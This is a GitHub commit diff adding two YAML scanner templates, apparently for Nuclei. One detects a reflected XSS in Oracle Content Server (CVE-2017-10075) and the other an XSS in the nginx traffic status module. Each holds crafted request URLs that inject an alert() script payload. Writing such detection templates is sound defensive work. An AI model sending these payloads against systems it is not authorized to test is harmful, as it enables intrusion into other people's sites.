File tree Expand file tree Collapse file tree 2 files changed +43
-0
lines changed
Expand file tree Collapse file tree 2 files changed +43
-0
lines changed Original file line number Diff line number Diff line change 1+ id : CVE-2017-10075
2+
3+ info :
4+ name : Oracle Content Server XSS
5+ author : madrobot
6+ severity : medium
7+
8+ requests :
9+ - method : GET
10+ path :
11+ - " {{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" &PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
12+ - " {{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" &PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
13+
14+ matchers-condition : and
15+ matchers :
16+ - type : status
17+ status :
18+ - 200
19+ - type : word
20+ words :
21+ - " <script>alert(31337)</script>"
22+ part : body
Original file line number Diff line number Diff line change 1+ id : nginx-module-vts-xss
2+
3+ info :
4+ name : Nginx virtual host traffic status module XSS
5+ author : madrobot
6+ severity : medium
7+
8+ requests :
9+ - method : GET
10+ path :
11+ - " {{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
12+
13+ matchers-condition : and
14+ matchers :
15+ - type : status
16+ status :
17+ - 200
18+ - type : word
19+ words :
20+ - " <script>alert(31337)</script>"
21+ part : body
You can’t perform that action at this time.
0 commit comments